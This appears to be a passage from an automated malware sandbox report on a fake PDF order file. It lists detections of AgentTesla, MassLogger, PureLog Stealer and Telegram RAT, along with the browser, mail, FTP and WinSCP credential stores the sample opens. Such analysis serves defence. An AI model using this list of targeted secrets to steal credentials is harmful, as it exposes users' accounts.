Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\TrojanAI.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTDCFD.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTDD0E.tmp VolumeInformation
Source: C:\Windows\System32\msdtc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Locator.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\SensorDataService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\snmptrap.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Spectrum.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0042344A GetSystemTimeAsFileTime,__aulldiv,

0_2_0042344A

Source: C:\Windows\System32\AppVClient.exe

Code function: 6_2_00BC0080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW,

6_2_00BC0080

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00431E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00431E8E

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0041DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0041DDC0

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1694378797.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: msmpeng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 9.2.RegSvcs.exe.36e2790.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.neworigin.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36a5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36a5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36e2790.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7692, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Yara detected MassLogger RAT

Source: Yara match	File source: 12.0.server02.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server02.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.36e2790.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36a5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3744790.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3744790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegSvcs.exe.3e95570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.244df16.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegSvcs.exe.3e96458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegSvcs.exe.3e96458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4bc0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4ea0ee8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegSvcs.exe.3e95570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.244df16.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4ea0ee8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4bc0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1739380973.0000000004EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1960895192.0000000003E95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1738828207.0000000004BC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1735755536.000000000244D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.0.server02.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server02.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\server02.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 9.2.RegSvcs.exe.36e2790.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.neworigin.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36a5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.server02.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36a5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36e2790.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server02.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7692, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 9.2.RegSvcs.exe.36e2790.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.neworigin.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36a5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36a5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36e2790.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7692, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Yara detected MassLogger RAT

Source: Yara match	File source: 12.0.server02.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server02.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.36e2790.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.36a5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3744790.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3744790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegSvcs.exe.3e95570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.244df16.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegSvcs.exe.3e96458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegSvcs.exe.3e96458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4bc0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4ea0ee8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegSvcs.exe.3e95570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.244df16.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4ea0ee8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.4bc0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1739380973.0000000004EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1960895192.0000000003E95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1738828207.0000000004BC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1735755536.000000000244D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.0.server02.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7536, type: MEMORYSTR
